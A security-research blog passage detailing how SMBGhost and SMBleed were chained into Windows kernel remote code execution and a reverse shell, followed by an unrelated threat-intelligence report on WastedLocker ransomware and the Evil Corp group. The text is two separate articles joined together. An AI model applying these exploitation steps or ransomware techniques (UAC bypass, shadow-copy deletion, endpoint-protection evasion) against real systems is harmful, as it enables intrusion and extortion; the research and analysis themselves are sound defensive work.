In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has less limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in the modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try and read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us grooming the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/  (orange) LIST_ENTRY ConnectionBufferList;
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  (blue) PBYTE UserBufferPtr;
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  (blue) PBYTE PoolAllocationPtr;
/*38*/  (blue) PMDL pMdl1;
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  (blue) PMDL pMdl2;
/*58*/  (orange) PVOID pSrvNetWskStruct;
/*60*/  DWORD SmbFlags;
/*64*/  (orange) PVOID TracingPtr1;
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  (orange) PVOID TracingPtr2;
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
};
#pragma pack(pop)

The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there, too. On the bright side, there are several pointers to modules one additional dereference away:

At this point, we noticed that since we can override those pointers in SRVNET_RECT, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
{
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);
    }

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL
        }

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');
    }
}

Upon freeing the buffer, if buffer flags 0x02 (means the buffer is part of a lookaside list) and 0x01 (means the buffer has no transport header) are set, some operations are made on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer back to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at the operations in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16, 29), a side effect we hoped to avoid.

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The Flags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECT struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC and such fix was left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(pSrvNetRecv + 0x118);
Arg1 = *(ULONG_PTR)(pSrvNetRecv + 0x128);
Arg2 = *(ULONG_PTR)(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECT struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though a 8-arguments function is intended to be called, we can replace the pointer with a function that expects any other amount of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECT struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECT struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECT struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECT struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the amount of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited by functions implemented in srvnet.sys, we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct which holds a pointer to the string, and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data:

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 version R5 and newer. Since Windows 10 version R5 UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work, we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists buffer reusing, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list.

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor Incoming packets handled
Logical processor 1 0.2%
Logical processor 2 0.8%
Logical processor 3 7.9%
Logical processor 4 91.1%

Here’s the distribution of handling the decompression:

Logical processor Decompressions executed
Logical processor 1 13.3%
Logical processor 2 5.1%
Logical processor 3 6.8%
Logical processor 4 74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for a reading and writing order.

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

ZecOps classify forensics logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities, that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression

Summary

This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.

WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group

By: nccsante
23 June 2020 at 12:25

Authors: Nikolaos Pantazopoulos, Stefano Antenucci (@Antelox) Michael Sandee and in close collaboration with NCC’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

1. Introduction

WastedLocker is a new ransomware locker we’ve detected being used since May 2020. We believe it has been in development for a number of months prior to this and was started in conjunction with a number of other changes we have seen originate from the Evil Corp group in 2020. Evil Corp were previously associated to the Dridex malware and BitPaymer ransomware, the latter came to prominence in the first half of 2017. Recently Evil Corp has changed a number of TTPs related to their operations further described in this article. We believe those changes were ultimately caused by the unsealing of indictments against Igor Olegovich Turashev and Maksim Viktorovich Yakubets, and the financial sanctions against Evil Corp in December 2019. These legal events set in motion a chain of events to disconnect the association of the current Evil Corp group and these two specific indicted individuals and the historic actions of Evil Corp.

2. Attribution and Actor Background

We have tracked the activities of the Evil Corp group for many years, and even though the group has changed its composition since 2011, we have been able to keep track of the group’s activities under this name.

2.1 Actor Tracking

Business associations are fairly fluid in organised cybercrime groups, Partnerships and affiliations are formed and dissolved much more frequently than in nation state sponsored groups, for example. Nation state backed groups often remain operational in similar form over longer periods of time. For this reason, cyber threat intelligence reporting can be misleading, given the difficulty of maintaining assessments of the capabilities of cybercriminal groups which are accurate and current.

As an example, the Anunak group (also known as FIN7 and Carbanak) has changed composition quite frequently. As a result, the public reporting on FIN7 and Carbanak and their various associations in various open and closed source threat feeds can distort the current reality. The Anunak or FIN7 group has worked closely with Evil Corp, and also with the group publicly referred to as TA505. Hence, TA505 activity is sometimes still reported as Evil Corp activity, even though these groups have not worked together since the second half of 2017.


It can also be difficult to accurately attribute responsibility for a piece of malware or a wave of infection because commodity malware is typically sold to interested parties for mass distribution, or supplied to associates who have experience in monetising access to a specific type of business, such as financial institutions. Similarly, it is easy for confusion to arise around the many financially oriented organised crime groups which are tracked publicly. Access to victim organisations is traded as a commodity between criminal actors and so business links often exist which are not necessarily related to the day to day operations of a group.

2.2 Evil Corp

Nevertheless, despite these difficulties, we feel that we can assert the following with high confidence, due to our in depth tracking of this group as it posed a significant threat to our clients. Evil Corp has been operating the Dridex malware since July 2014 and provided access to several groups and individual threat actors. However, towards the end of 2017 Evil Corp became smaller and used Dridex infections almost exclusively for targeted ransomware campaigns by deploying BitPaymer. The majority of victims were in North America (mainly USA) with a smaller number in Western Europe and instances outside of these regions being just scattered, individual cases. During 2018, Evil Corp had a short lived partnership with TheTrick group; specifically, leasing out access to BitPaymer for a while, prior to their use of Ryuk.

In 2019 a fork of BitPaymer usually referred to as DoppelPaymer appeared, although this was ransomware as a service and thus was not the same business model. We have observed some cooperation between the two groups, but as yet can draw no definitive conclusions as to the current relationship between these two threat actor groups.


After the unsealing of indictments by the US Department of Justice and actions against Evil Corp as group by the US Treasury Department, we detected a short period of inactivity from Evil Corp until January 2020. However, since January 2020 activity has resumed as usual, with victims appearing in the same regions as before. It is possible, however, that this was primarily a strategic move to suggest to the public that Evil Corp was still active as, from around the middle of March 2020, we failed to observe much activity from them in terms of BitPaymer deployments. Of course, this period coincided with the lockdowns due to the COVID19 pandemic.


The development of new malware takes time and it is probable that they had already started the development of new techniques and malware. Early indications that this work was underway included the use of a variant of Gozi we refer to as Gozi ISFB 2 variant. It is thought that this variant is intended as a replacement for Dridex botnet 501 as one of the persistent components on a target network. Similarly, a customized version of the CobaltStrike loader has been observed, possibly intended as a replacement for the Empire PowerShell framework previously used.


The group has access to highly skilled exploit and software developers capable of bypassing network defences on all different levels. The group seems to put a lot of effort into bypassing endpoint protection products; this observation is based on the fact that when a certain version of their malware is detected on victim networks the group is back with an undetected version and able to continue after just a short time. This shows the importance of victims fully understanding each incident that happens. That is, detection or blocking of a single element from the more advanced criminal actors does not mean they have been defeated.

The lengths Evil Corp goes through in order to bypass endpoint protection tools is demonstrated by the fact that they abused a victim’s email so they could pose as a legitimate potential client to a vendor and request a trial license for a popular endpoint protection product that is not commonly available.

It appears the group regularly finds innovative but practical approaches to bypass detection in victim networks based on their practical experience gained throughout the years. They also demonstrate patience and persistence. In one case, they successfully compromised a target over 6 months after their initial failure to obtain privileged access. They also display attention to detail by, for example, ensuring that they obtain the passwords to disable security tools on a network prior to deploying the ransomware.

2.3 WastedLocker


The new WastedLocker ransomware appeared in May 2020 (a technical description is included below). The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. The abbreviation of the victim’s name was also seen in BitPaymer, although a larger portion of the organisation name was used in BitPaymer and individual letters were sometimes replaced by similar looking numbers.

Technically, WastedLocker does not have much in common with BitPaymer, apart from the fact that it appears that victim specific elements are added using a specific builder rather than at compile time, which is similar to BitPaymer. Some similarities were also noted in the ransom note generated by the two pieces of malware. The first WastedLocker example we found contained the victim name as in BitPaymer ransom notes and also included both a protonmail.com and tutanota.com email address. Later versions also contained other Protonmail and Tutanota email domains, as well as Eclipso and Airmail email addresses. Interestingly the user parts of the email addresses listed in the ransom messages are numeric (usually 5 digit numbers) which is similar to the 6 to 12 digit numbers seen used by BitPaymer in 2018.

Evil Corp are selective in terms of the infrastructure they target when deploying their ransomware. Typically, they hit file servers, database services, virtual machines and cloud environments. Of course, these choices will also be heavily influenced by what we may term their ‘business model’ – which also means they should be able to disable or disrupt backup applications and related infrastructure. This increases the time for recovery for the victim, or in some cases due to unavailability of offline or offsite backups, prevents the ability to recover at all.


It is interesting that the group has not appeared to have engaged in extensive information stealing or threatened to publish information about victims in the way that the DoppelPaymer and many other targeted ransomware operations have. We assess that the probable reason for not leaking victim information is the unwanted attention this would draw from law enforcement and the public.

3. Distribution

While many things have changed in the TTPs of Evil Corp recently, one very notable element has not changed, the distribution via the SocGholish fake update framework. This framework is still in use although it is now used to directly distribute a custom CobaltStrike loader, described in 4.1, rather than Dridex as in the past years. One of the more notable features of this framework is the evaluation of wether a compromised victim system is part of a larger network, as a sole enduser system is of no use to the attackers. The SocGholish JavaScript bot has access to information from the system itself as it runs under the privileges of the browser user. The bot collects a large set of information and sends that to the SocGholish server side which, in turn, returns a payload to the victim system. Other methods of distribution also appear to still be in use, but we have not been able to independently verify this at the time of writing.

4. Technical Analysis

4.1 CobaltStrike payloads

The CobaltStrike payloads are embedded inside two types of PowerShell scripts. The first type (which targets Windows 64-bit only) decodes a base64 payload twice and then decrypts it using the AES algorithm in CBC mode. The AES key is derived by computing the SHA256 hash of the hard-coded string ‘saN9s9pNlD5nJ2EyEd4rPym68griTOMT’ and the initialisation vector (IV), is derived from the first 16 bytes of the twice base64-decoded payload. The script converts the decrypted payload (a base64-encoded string) to bytes and allocates memory before executing it.

The second type is relatively simpler and includes two embedded base64-encoded payloads, an injector and a loader for the CobaltStrike payload. It appears that both the injector and the loader are part of the ‘Donut’ project [3].

An interesting behaviour can be spotted in the CobaltStrike payloads that are delivered from the second type of PowerShell scripts. In these, the loader has been modified with the purpose of detecting CrowdStrike software (Figure 1). If the C:\\Program Files\\CrowdStrike directory exists, then the ‘FreeConsole’ Windows API is called after loading the CobaltStrike payload. Otherwise, the ‘FreeConsole’ function is called before loading the CobaltStrike beacon. It is assumed that this is an attempt to bypass CrowdStrike’s endpoint solution, although it still unclear if this is the case.

Figure 1: Decompilation showing CrowdStrike specific detection logic

4.2 The Crypter

WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, the code turned out to be very basic and used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader.

The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied.

The first action performed by the crypter code is to check some specific registry key. In the variants analysed the registry key is either: interface\{b196b287-bab4-101a-b69c-00aa00341d07} or interface\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}. These keys relate to the UCOMIEnumConnections Interface and the IActiveScriptParseProcedure32 interface respectively. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique.

In the next step the crypter allocates a memory buffer calling the VirtualAlloc API. A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter’s code in memory with the code of the payload just decrypted, and jumps to its entry point.

As noted above, we have observed this crypter being used by other malware families as well. Related information and IOCs can be found in the Appendix.

4.3 WastedLocker Ransomware

WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly.

First, Wastedlocker decrypts the strings which are stored in the .bss section and then calculates a DWORD value that is used later for locating decrypted strings that are related to the encryption process. This is described in more detail in the String encryption section. In addition, the ransomware creates a log file lck.log and then sets an exception handler that creates a crash dump file in the Windows temporary folder with the filename being the ransomware’s binary filename.

If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder. Once loaded, the hijacked DLL (winmm.dll) is patched to execute the aforementioned ADS.

The ransomware supports the following command line parameters (Table 1):

Parameter Purpose
-r i. Delete shadow copies
ii. Copy the ransomware binary file to %windir%\system32 and take ownership of it (takeown.exe /F filepath) and reset the ACL permissions
iii. Create and run a service. The service is deleted once the encryption process is completed.
-s Execute service’s entry
-p directory_path Encrypt files in a specified directory and then proceed with the rest of the files in the drive
-f directory_path Encrypt files in a specified directory
Table 1 – WastedLocker command line parameters

It is also worth noting that in case of any failure from the first two parameters (-r and –s), the ransomware proceeds with the encryption but applies the following registry modifications in the registry key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:

Name Modification
ProxyBypass Deletes this key
IntranetName Deletes this key
